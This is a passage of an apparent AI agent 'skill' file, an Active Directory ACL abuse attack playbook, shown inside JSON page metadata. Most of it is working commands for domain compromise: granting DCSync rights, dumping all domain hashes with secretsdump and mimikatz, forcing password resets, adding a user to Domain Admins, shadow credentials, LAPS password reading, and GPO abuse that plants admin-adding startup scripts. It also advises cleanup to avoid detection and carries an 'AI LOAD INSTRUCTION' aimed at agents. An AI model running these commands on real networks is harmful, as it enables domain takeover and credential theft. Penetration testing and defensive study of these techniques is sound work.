--action add --dc-ip DC","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"WriteDACL","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"powershell"},"content":[{"text":"# Grant DCSync rights to yourself\nAdd-DomainObjectAcl -TargetIdentity \"DC=domain,DC=com\" -PrincipalIdentity lowpriv -Rights DCSync\n\n# Impacket\ndacledit.py -action write -rights DCSync -principal lowpriv -target-dn \"DC=domain,DC=com\" DOMAIN/lowpriv:pass -dc-ip DC","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"WriteOwner","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"powershell"},"content":[{"text":"# Step 1: Take ownership\nSet-DomainObjectOwner -Identity targetuser -OwnerIdentity lowpriv\n\n# Step 2: Grant WriteDACL to yourself (as owner)\nAdd-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity lowpriv -Rights All\n\n# Step 3: Now exploit as GenericAll","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"ForceChangePassword","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Impacket\nrpcclient -U 'DOMAIN/attacker%pass' DC01 -c \"setuserinfo2 targetuser 23 'NewP@ss123!'\"\n\n# PowerView\nSet-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force)\n\n# net rpc\nnet rpc password targetuser 'NewP@ss123!' -U DOMAIN/attacker%pass -S DC01","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"AddMember to Group","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"powershell"},"content":[{"text":"# Add self to privileged group\nAdd-DomainGroupMember -Identity \"Domain Admins\" -Members lowpriv\n\n# Impacket\nnet rpc group addmem \"Domain Admins\" lowpriv -U DOMAIN/attacker%pass -S DC01","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"4. DCSYNC ATTACK","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Prerequisites","type":"text"}]},{"type":"paragraph","content":[{"text":"The principal needs ","type":"text"},{"text":"both","type":"text","marks":[{"type":"strong"}]},{"text":" of these replication rights on the domain object:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"DS-Replication-Get-Changes","type":"text","marks":[{"type":"code_inline"}]},{"text":" (GUID: ","type":"text"},{"text":"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"DS-Replication-Get-Changes-All","type":"text","marks":[{"type":"code_inline"}]},{"text":" (GUID: ","type":"text"},{"text":"1131f6ad-9c07-11d1-f79f-00c04fc2dcd2","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Execution","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Impacket — dump all hashes\nsecretsdump.py DOMAIN/user:password@DC01 -just-dc\n\n# Specific account only\nsecretsdump.py DOMAIN/user:password@DC01 -just-dc-user krbtgt\n\n# Mimikatz\nlsadump::dcsync /domain:domain.com /user:krbtgt\nlsadump::dcsync /domain:domain.com /all /csv\n\n# Impacket with Kerberos auth\nexport KRB5CCNAME=admin.ccache\nsecretsdump.py -k -no-pass DC01.domain.com -just-dc","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Who Has DCSync by Default?","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Domain Admins","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Enterprise Admins","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Domain Controllers group","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BUILTIN\\Administrators","type":"text","marks":[{"type":"code_inline"}]},{"text":" (on domain object)","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"5. SHADOW CREDENTIALS","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Attack Flow","type":"text"}]},{"type":"paragraph","content":[{"text":"Write ","type":"text"},{"text":"msDS-KeyCredentialLink","type":"text","marks":[{"type":"code_inline"}]},{"text":" on target → generate certificate → authenticate via PKINIT.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# pyWhisker (Linux)\npywhisker.py -d domain.com -u attacker -p pass --target victim --action add --dc-ip DC01\n# Output: DeviceID and PFX file\n\n# Authenticate with certificate\ngettgtpkinit.py -cert-pfx victim.pfx -pfx-pass RANDOM_PASS domain.com/victim victim.ccache\nexport KRB5CCNAME=victim.ccache\n\n# Extract NT hash from TGT (for pass-the-hash)\ngetnthash.py -key AS_REP_KEY domain.com/victim","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"powershell"},"content":[{"text":"# Whisker (Windows)\nWhisker.exe add /target:victim /domain:domain.com /dc:DC01.domain.com\n# → Provides Rubeus command to get TGT\nRubeus.exe asktgt /user:victim /certificate:CERT_B64 /password:PASS /ptt","type":"text"}]},{"type":"paragraph","content":[{"text":"Cleanup","type":"text","marks":[{"type":"strong"}]},{"text":": Remove the added key credential to avoid detection.","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"6. LAPS PASSWORD READING","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"powershell"},"content":[{"text":"# PowerView\nGet-DomainComputer -Identity TARGET -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime\n\n# AD Module\nGet-ADComputer -Identity TARGET -Properties ms-Mcs-AdmPwd | Select-Object ms-Mcs-AdmPwd\n\n# LAPS v2 (Windows LAPS)\nGet-LapsADPassword -Identity TARGET -AsPlainText\n\n# CrackMapExec\ncrackmapexec ldap DC01 -u user -p pass --module laps","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"7. GPO ABUSE","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Identify Writable GPOs","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"powershell"},"content":[{"text":"# PowerView — find GPOs where you have write access\nGet-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {\n ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite') -and\n ($_.SecurityIdentifier -match 'YOUR_SID')\n}","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Exploit via SharpGPOAbuse","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"cmd"},"content":[{"text":"# Add local admin via GPO\nSharpGPOAbuse.exe --AddLocalAdmin --UserAccount lowpriv --GPOName \"Vulnerable GPO\"\n\n# Add scheduled task via GPO\nSharpGPOAbuse.exe --AddComputerTask --TaskName \"Update\" --Author DOMAIN\\admin --Command \"cmd.exe\" --Arguments \"/c net localgroup administrators lowpriv /add\" --GPOName \"Vulnerable GPO\"\n\n# Add startup script\nSharpGPOAbuse.exe --AddComputerScript --ScriptName \"evil.bat\" --ScriptContents \"net localgroup administrators lowpriv /add\" --GPOName \"Vulnerable GPO\"","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# pyGPOAbuse (Linux)\npygpoabuse.py DOMAIN/user:pass -gpo-id \"GPO_GUID\" -command \"net localgroup administrators lowpriv /add\" -dc-ip DC01","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"8. ACL ATTACK DECISION TREE","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Have domain user access — want to escalate via ACL\n│\n├── Run BloodHound → analyze shortest paths to DA\n│ └── Upload data → \"Shortest Paths to Domain Admins from Owned Principals\"\n│\n├── Direct ACL on user object?\n│ ├── GenericAll → force password change, shadow creds, or targeted kerberoast (§3)\n│ ├── GenericWrite → shadow credentials or set SPN (§3/§5)\n│ ├── ForceChangePassword → reset password directly (§3)\n│ ├── WriteDACL → grant yourself GenericAll, then exploit (§3)\n│ └── WriteOwner → take ownership → WriteDACL → GenericAll (§3)\n│\n├── ACL on group?\n│ ├── AddMember / GenericAll → add self to privileged group (§3)\n│ └── WriteDACL → grant AddMember, then add self\n│\n├── ACL on computer object?\n│ ├── GenericAll/GenericWrite → RBCD attack (§3)\n│ ├── AllExtendedRights → read LAPS password (§6)\n│ └── GenericWrite → shadow credentials on machine (§5)\n│\n├── ACL on domain object?\n│ ├── WriteDACL → grant DCSync rights to self (§4)\n│ └── Replication rights already? → DCSync directly (§4)\n│\n├── ACL on GPO linked to privileged OU?\n│ └── Write access → add admin / scheduled task via GPO (§7)\n│\n└── Complex multi-hop chain?\n └── Load BLOODHOUND_PATHS.md for Cypher queries and chain analysis","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"active-directory-acl-abuse","author":"@skillopedia","source":{"stars":853,"repo_name":"hack-skills","origin_url":"https://github.com/yaklang/hack-skills/blob/HEAD/skills/active-directory-acl-abuse/SKILL.md","repo_owner":"yaklang","body_sha256":"8f70c8a676670ee512031c76ea08aa65f52520bda8031df22a41be80ffc42b0d","cluster_key":"a47553cdce565ff7a05e5bfb331748b213117dbd421b604f090960a66fd24acb","clean_bundle":{"format":"clean-skill-bundle-v1","source":"yaklang/hack-skills/skills/active-directory-acl-abuse/SKILL.md","attachments":[{"id":"486e03a2-5929-5288-b861-73487ece2247","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/486e03a2-5929-5288-b861-73487ece2247/attachment.md","path":"BLOODHOUND_PATHS.md","size":7305,"sha256":"285eb5fdf7f283e10b4ad87c7f019c53b983c86c59c9d01fa038c3d954c2607e","contentType":"text/markdown; charset=utf-8"}],"bundle_sha256":"27cc064083205abaa7ee4e7fad6a2c233ada71898f9c205fe57503599c6d3946","attachment_count":1,"text_attachments":1,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/active-directory-acl-abuse/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"security","import_tag":"clean-skills-v1","description":"Active Directory ACL abuse playbook. Use when exploiting misconfigured AD permissions including GenericAll, WriteDACL, DCSync rights, shadow credentials, LAPS reading, GPO abuse, and BloodHound-guided attack paths."}},"renderedAt":1782981313726}

SKILL: AD ACL Abuse — Expert Attack Playbook AI LOAD INSTRUCTION : Expert AD ACL abuse techniques. Covers BloodHound enumeration, dangerous ACEs (GenericAll, WriteDACL, WriteOwner, etc.), DCSync, shadow credentials, targeted kerberoasting, group manipulation, LAPS, and GPO abuse. Base models miss complex ACL chain exploitation and Cypher query patterns. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-kerberos-attacks for Kerberos attacks often chained with ACL abuse - active-directory-certificate-services for certificate-based attacks after ACL exploitation - ntlm-r…